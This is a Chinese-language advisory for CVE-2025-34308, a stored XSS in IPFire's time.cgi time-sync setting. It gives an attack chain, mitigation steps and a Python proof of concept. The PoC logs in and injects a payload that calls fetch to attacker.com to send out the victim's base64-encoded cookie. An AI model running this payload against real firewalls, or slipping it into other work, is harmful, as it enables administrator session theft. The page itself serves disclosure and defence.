CVE-2025-34308 IPFire存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-34308

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

IPFire

漏洞概述

IPFire是一款开源的Linux防火墙发行版，广泛应用于企业和组织的网络安全边界防护。该漏洞存在于IPFire的Web管理界面中，具体位于时间同步配置功能模块。攻击者利用该漏洞可以在时间服务器的默认时间同步设置中注入恶意JavaScript代码，由于该输入未经适当消毒处理即被存储并在后续页面访问时直接渲染执行，形成存储型跨站脚本攻击（Stored XSS）。攻击者只需拥有低权限账户即可发起攻击，但需要诱导具有管理权限的用户访问受污染的配置页面才能触发完整攻击链。此漏洞影响IPFire 2.29（Core Update 198）之前的所有版本，CVSS评分5.4，属于中等严重程度。成功利用可导致会话劫持、凭据窃取、管理员操作模拟等安全风险，威胁网络边界安全。

技术细节

该存储型XSS漏洞根源于IPFire的time.cgi脚本对UPDATE_VALUE参数的输入验证不足。当管理员通过Web界面修改默认时间同步设置时，应用将UPDATE_VALUE参数值通过HTTP POST请求发送至/cgi-bin/time.cgi端点。问题在于该参数值在存储前未执行严格的HTML特殊字符转义或内容安全策略过滤，直接存入后端配置存储。当其他用户访问Time Server配置页面时，存储的恶意payload被原样嵌入到响应HTML中由浏览器解析执行。攻击者可构造包含<script>标签或事件处理器（如onerror、onload）的payload，例如<img src=x onerror=alert(document.cookie)>，利用该漏洞窃取受害者的认证Cookie或执行任意客户端操作。由于payload存储在服务器端，所有访问该页面的用户都会受到攻击影响，形成持久性威胁。

攻击链分析

STEP 1

步骤1

攻击者获取IPFire系统的低权限账户凭据

STEP 2

步骤2

攻击者构造恶意XSS payload并通过HTTP POST请求发送至/cgi-bin/time.cgi端点，注入到UPDATE_VALUE参数中

STEP 3

步骤3

payload被存储在服务器端配置中，无需立即触发

STEP 4

步骤4

具有管理权限的用户访问Time Server配置页面

STEP 5

步骤5

页面渲染时从后端读取并输出未经过滤的payload，浏览器执行恶意JavaScript代码

STEP 6

步骤6

攻击者通过XSS成功窃取管理员Cookie或执行任意客户端操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

# CVE-2025-34308 PoC - IPFire Stored XSS in time.cgi
# Target: IPFire < 2.29 Core Update 198

TARGET = "http://target-ipfire:444/cgi-bin/time.cgi"
USERNAME = "admin"
PASSWORD = "password"

def login(session, target, username, password):
    """Authenticate to IPFire web interface"""
    login_url = f"{target.replace('/cgi-bin/time.cgi', '')}/cgi-bin/login.cgi"
    data = {
        'username': username,
        'password': password
    }
    response = session.post(login_url, data=data, timeout=10)
    return 'login' not in response.url or response.status_code == 200

def exploit_stored_xss(session, target):
    """Inject XSS payload via UPDATE_VALUE parameter"""
    # XSS payload - steals admin cookies
    xss_payload = '<img src=x onerror="fetch(`https://attacker.com/steal?c=`+btoa(document.cookie))">'
    
    data = {
        'UPDATE_VALUE': xss_payload,
        'submit': 'Update'
    }
    
    response = session.post(target, data=data, timeout=10)
    return response.status_code == 200

def main():
    session = requests.Session()
    
    print("[*] Logging into IPFire...")
    if not login(session, TARGET, USERNAME, PASSWORD):
        print("[-] Authentication failed")
        return
    print("[+] Authentication successful")
    
    print("[*] Injecting stored XSS payload...")
    if exploit_stored_xss(session, TARGET):
        print("[+] XSS payload injected successfully")
        print("[*] Payload will execute when admin visits Time Server page")
    else:
        print("[-] Injection failed")

if __name__ == "__main__":
    main()

影响范围

IPFire < 2.29 (Core Update 198)

防御指南

临时缓解措施

如无法立即升级，可通过以下措施临时缓解：在Web服务器层面配置输入过滤规则，拒绝包含<script>、<img>、<svg>等危险标签的UPDATE_VALUE参数；限制低权限用户访问时间同步配置功能；启用HTTPOnly和Secure标志保护Cookie；监控/cgi-bin/time.cgi的异常请求日志。建议尽快安排计划性维护升级到官方修复版本。